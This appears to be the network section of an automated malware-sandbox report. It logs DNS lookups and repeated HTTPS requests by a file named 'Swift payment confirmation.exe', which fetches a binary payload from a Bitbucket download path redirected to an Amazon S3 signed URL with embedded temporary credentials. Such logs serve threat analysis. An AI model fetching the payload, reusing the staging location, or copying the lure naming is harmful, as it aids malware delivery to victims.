Oct 31, 2024 09:07:06.501331091 CET | 192.168.2.5 | 1.1.1.1 | 0x9b7e | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 09:06:57.138525963 CET | 1.1.1.1 | 192.168.2.5 | 0xffc6 | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:57.138525963 CET | 1.1.1.1 | 192.168.2.5 | 0xffc6 | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:57.138525963 CET | 1.1.1.1 | 192.168.2.5 | 0xffc6 | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:58.863223076 CET | 1.1.1.1 | 192.168.2.5 | 0xbb1 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 31, 2024 09:06:58.863223076 CET | 1.1.1.1 | 192.168.2.5 | 0xbb1 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 31, 2024 09:06:58.863223076 CET | 1.1.1.1 | 192.168.2.5 | 0xbb1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.102.228 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:58.863223076 CET | 1.1.1.1 | 192.168.2.5 | 0xbb1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.97.171 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:58.863223076 CET | 1.1.1.1 | 192.168.2.5 | 0xbb1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.107.180 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:58.863223076 CET | 1.1.1.1 | 192.168.2.5 | 0xbb1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.29.224 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:58.863223076 CET | 1.1.1.1 | 192.168.2.5 | 0xbb1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.170.97 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:58.863223076 CET | 1.1.1.1 | 192.168.2.5 | 0xbb1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.121.169 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:58.863223076 CET | 1.1.1.1 | 192.168.2.5 | 0xbb1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.225.113 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:58.863223076 CET | 1.1.1.1 | 192.168.2.5 | 0xbb1 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.222.9 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:07:06.520440102 CET | 1.1.1.1 | 192.168.2.5 | 0x9b7e | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 31, 2024 09:07:06.520440102 CET | 1.1.1.1 | 192.168.2.5 | 0x9b7e | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 31, 2024 09:07:06.520440102 CET | 1.1.1.1 | 192.168.2.5 | 0x9b7e | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.29.82 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:07:06.520440102 CET | 1.1.1.1 | 192.168.2.5 | 0x9b7e | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.131.65 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:07:06.520440102 CET | 1.1.1.1 | 192.168.2.5 | 0x9b7e | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.170.139 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:07:06.520440102 CET | 1.1.1.1 | 192.168.2.5 | 0x9b7e | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.41.233 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:07:06.520440102 CET | 1.1.1.1 | 192.168.2.5 | 0x9b7e | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.171.9 | A (IP address) | IN (0x0001) | false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com16.182.40.217A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com52.217.130.145A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com52.217.103.225A (IP address)IN (0x0001)false
                                                                              • bitbucket.org
                                                                              • bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 185.166.143.50 | 443 | 1968 | C:\Users\user\Desktop\Swift payment confirmation.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 08:06:58 UTC | 187 | OUT | GET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bitbucket.org
2024-10-31 08:06:58 UTC | 5307 | IN | HTTP/1.1 302 Found
                                                                              Date: Thu, 31 Oct 2024 08:06:58 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 0
                                                                              Server: AtlassianEdge
                                                                              Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgt [TRUNCATED]
                                                                              Expires: Thu, 31 Oct 2024 08:06:58 GMT
                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                              X-Used-Mesh: False
                                                                              Vary: Accept-Language, Origin
                                                                              Content-Language: en
                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                              X-Dc-Location: Micros-3
                                                                              X-Served-By: c01c4ed28dfb
                                                                              X-Version: 6cbe3b68176f
                                                                              X-Static-Version: 6cbe3b68176f
                                                                              X-Request-Count: 3753
                                                                              X-Render-Time: 0.04803323745727539
                                                                              X-B3-Traceid: a35ae47f6bce4d45a214b59af2fbf7ab
                                                                              X-B3-Spanid: 0012cd5249c9b853
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com ws [TRUNCATED]
                                                                              X-Usage-Quota-Remaining: 999085.364
                                                                              X-Usage-Request-Cost: 929.03
                                                                              X-Usage-User-Time: 0.019758
                                                                              X-Usage-System-Time: 0.008113
                                                                              X-Usage-Input-Ops: 0
                                                                              X-Usage-Output-Ops: 0
                                                                              Age: 0
                                                                              X-Cache: MISS
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Xss-Protection: 1; mode=block
                                                                              Atl-Traceid: a35ae47f6bce4d45a214b59af2fbf7ab
                                                                              Atl-Request-Id: a35ae47f-6bce-4d45-a214-b59af2fbf7ab
                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                              Server-Timing: atl-edge;dur=172,atl-edge-internal;dur=5,atl-edge-upstream;dur=171,atl-edge-pop;desc="aws-eu-central-1"
                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 52.217.102.228 | 443 | 1968 | C:\Users\user\Desktop\Swift payment confirmation.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 08:06:59 UTC | 1293 | OUT | GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJew [TRUNCATED]
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bbuseruploads.s3.amazonaws.com
2024-10-31 08:06:59 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                              x-amz-id-2: a8kyaIYRKgimOZ2WVH4HdbcidJLv5mvtLbDpLTv5Qdmbt0n4RJdM4v/DssV2L+fBhdxCDKjWmm0=
                                                                              x-amz-request-id: VQ33RNCZVX21JWBK
                                                                              Date: Thu, 31 Oct 2024 08:07:00 GMT
                                                                              Last-Modified: Sun, 27 Oct 2024 21:53:04 GMT
                                                                              ETag: "271a5d4a7e33f8c487190f127c5e2f43"
                                                                              x-amz-server-side-encryption: AES256
                                                                              x-amz-version-id: iLAYpg_EnWYHrKq5hXoEQZgnva5dDdpK
                                                                              Content-Disposition: attachment; filename="233_Hherfkswbzh"
                                                                              Accept-Ranges: bytes
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 383260
                                                                              Server: AmazonS3
                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49708 | 185.166.143.50 | 443 | 1968 | C:\Users\user\Desktop\Swift payment confirmation.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 08:07:02 UTC | 187 | OUT | GET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bitbucket.org
2024-10-31 08:07:02 UTC | 5308 | IN | HTTP/1.1 302 Found
                                                                              Date: Thu, 31 Oct 2024 08:07:02 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 0
                                                                              Server: AtlassianEdge
                                                                              Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgt [TRUNCATED]
                                                                              Expires: Thu, 31 Oct 2024 08:07:02 GMT
                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                              X-Used-Mesh: False
                                                                              Vary: Accept-Language, Origin
                                                                              Content-Language: en
                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                              X-Dc-Location: Micros-3
                                                                              X-Served-By: 8e424940a51d
                                                                              X-Version: 6cbe3b68176f
                                                                              X-Static-Version: 6cbe3b68176f
                                                                              X-Request-Count: 591
                                                                              X-Render-Time: 0.058461904525756836
                                                                              X-B3-Traceid: deec59e3d6f34e328661d9925ec7ff9a
                                                                              X-B3-Spanid: e215df6d133f0e7b
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Content-Security-Policy: base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.pr [TRUNCATED]
                                                                              X-Usage-Quota-Remaining: 998995.168
                                                                              X-Usage-Request-Cost: 1022.37
                                                                              X-Usage-User-Time: 0.019882
                                                                              X-Usage-System-Time: 0.010789
                                                                              X-Usage-Input-Ops: 0
                                                                              X-Usage-Output-Ops: 0
                                                                              Age: 0
                                                                              X-Cache: MISS
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Xss-Protection: 1; mode=block
                                                                              Atl-Traceid: deec59e3d6f34e328661d9925ec7ff9a
                                                                              Atl-Request-Id: deec59e3-d6f3-4e32-8661-d9925ec7ff9a
                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                              Server-Timing: atl-edge;dur=170,atl-edge-internal;dur=3,atl-edge-upstream;dur=168,atl-edge-pop;desc="aws-eu-central-1"
                                                                              Connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              3 | 192.168.2.5 | 49709 | 52.217.102.228 | 443 | 1968 | C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-10-31 08:07:03 UTC | 1293 | OUT | GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJew [TRUNCATED]
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bbuseruploads.s3.amazonaws.com
                                                                              2024-10-31 08:07:03 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                              x-amz-id-2: bVdg6i5bY44dG/cvat9yhPnpC2yuB4UqCqPVwrgeur4M0VdUqu7qO8gO1PqDN/4G0iBWDINfMGw=
                                                                              x-amz-request-id: X5JQXR8S3W0KCAEQ
                                                                              Date: Thu, 31 Oct 2024 08:07:04 GMT
                                                                              Last-Modified: Sun, 27 Oct 2024 21:53:04 GMT
                                                                              ETag: "271a5d4a7e33f8c487190f127c5e2f43"
                                                                              x-amz-server-side-encryption: AES256
                                                                              x-amz-version-id: iLAYpg_EnWYHrKq5hXoEQZgnva5dDdpK
                                                                              Content-Disposition: attachment; filename="233_Hherfkswbzh"
                                                                              Accept-Ranges: bytes
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 383260
                                                                              Server: AmazonS3
                                                                              Connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              4 | 192.168.2.5 | 49711 | 185.166.143.50 | 443 | 1968 | C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-10-31 08:07:06 UTC | 187 | OUT | GET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bitbucket.org
                                                                              2024-10-31 08:07:06 UTC | 5307 | IN | HTTP/1.1 302 Found
                                                                              Date: Thu, 31 Oct 2024 08:07:06 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 0
                                                                              Server: AtlassianEdge
                                                                              Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgt [TRUNCATED]
                                                                              Expires: Thu, 31 Oct 2024 08:07:06 GMT
                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                              X-Used-Mesh: False
                                                                              Vary: Accept-Language, Origin
                                                                              Content-Language: en
                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                              X-Dc-Location: Micros-3
                                                                              X-Served-By: 5844cf8c9e13
                                                                              X-Version: 6cbe3b68176f
                                                                              X-Static-Version: 6cbe3b68176f
                                                                              X-Request-Count: 2755
                                                                              X-Render-Time: 0.04441976547241211
                                                                              X-B3-Traceid: 1643f8d171c14af99997d214e75a6561
                                                                              X-B3-Spanid: 232f25aaae8b270f
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io e [TRUNCATED]
                                                                              X-Usage-Quota-Remaining: 999043.023
                                                                              X-Usage-Request-Cost: 942.17
                                                                              X-Usage-User-Time: 0.028265
                                                                              X-Usage-System-Time: 0.000000
                                                                              X-Usage-Input-Ops: 0
                                                                              X-Usage-Output-Ops: 0
                                                                              Age: 0
                                                                              X-Cache: MISS
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Xss-Protection: 1; mode=block
                                                                              Atl-Traceid: 1643f8d171c14af99997d214e75a6561
                                                                              Atl-Request-Id: 1643f8d1-71c1-4af9-9997-d214e75a6561
                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                              Server-Timing: atl-edge;dur=153,atl-edge-internal;dur=2,atl-edge-upstream;dur=152,atl-edge-pop;desc="aws-eu-central-1"
                                                                              Connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              5 | 192.168.2.5 | 49712 | 3.5.29.82 | 443 | 1968 | C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-10-31 08:07:07 UTC | 1293 | OUT | GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJew [TRUNCATED]
